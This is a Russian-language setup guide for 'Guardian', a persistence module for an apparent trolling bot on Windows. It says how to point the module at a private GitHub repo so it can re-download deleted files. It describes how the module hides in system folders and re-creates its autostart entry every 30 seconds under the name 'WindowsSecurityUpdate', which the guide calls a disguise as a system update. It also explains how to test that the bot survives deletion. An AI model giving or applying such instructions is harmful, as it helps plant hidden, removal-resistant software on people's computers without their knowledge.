🛡️ БЫСТРАЯ НАСТРОЙКА GUARDIAN

1. Установите зависимость:
   pip install requests

2. Настройте GitHub бэкап (ВАЖНО!):
   
   a) Создайте ПРИВАТНЫЙ репозиторий на GitHub
   b) Загрузите туда все файлы бота (bot.py, watchdog.py, photo/, и т.д.)
   c) Откройте файл guardian.py
   d) Найдите строку (line 14):
      GITHUB_BACKUP_URL = "https://github.com/YOUR_USERNAME/troling-bot/archive/refs/heads/main.zip"
   
   e) Замените на:
      GITHUB_BACKUP_URL = "https://github.com/ВАШ_USERNAME/ИМЯ_РЕПО/archive/refs/heads/main.zip"
   
   Пример:
   GITHUB_BACKUP_URL = "https://github.com/ivan123/my-bot/archive/refs/heads/main.zip"

3. Готово! Guardian будет установлен автоматически при нажатии:
   /start → ⚙️ Установить в автозагрузку

═══════════════════════════════════════════════════════════

КАК РАБОТАЕТ GUARDIAN:

✅ Следит за файлами (каждые 30 сек)
✅ Восстанавливает удалённые файлы
✅ Защищает автозагрузку
✅ Прячется в системных папках
✅ Запускается при перезагрузке

ЗАЩИТА:
- Уровень 1: Локальный бэкап (%TEMP%\.sysbackup\)
- Уровень 2: Скачивание с GitHub
- Уровень 3: Восстановление автозагрузки

ГДЕ ПРЯЧЕТСЯ:
%APPDATA%\Microsoft\Windows\SystemData\guardian.pyw

АВТОЗАГРУЗКА:
"WindowsSecurityUpdate" (маскировка под системное обновление)

═══════════════════════════════════════════════════════════

ПРОВЕРКА РАБОТЫ:

1. Установите через бот: /start → ⚙️ Установить в автозагрузку
2. Дождитесь сообщения: "🛡️ Guardian активирован"
3. Попробуйте удалить файл bot.py из %APPDATA%\Programs\
4. Через 30 сек файл должен восстановиться

═══════════════════════════════════════════════════════════

ЕСЛИ НЕ РАБОТАЕТ:

1. Проверьте что установлен requests: pip list | find "requests"
2. Проверьте URL GitHub в guardian.py
3. Убедитесь что репозиторий доступен
4. Проверьте логи Guardian (запустите вручную: python guardian.py)

═══════════════════════════════════════════════════════════

ВАЖНО:
- Репозиторий должен быть ПРИВАТНЫМ (не публичным!)
- URL должен заканчиваться на /archive/refs/heads/main.zip
- Если ваша ветка называется не main, замените на master или другую

ГОТОВО! 🎉
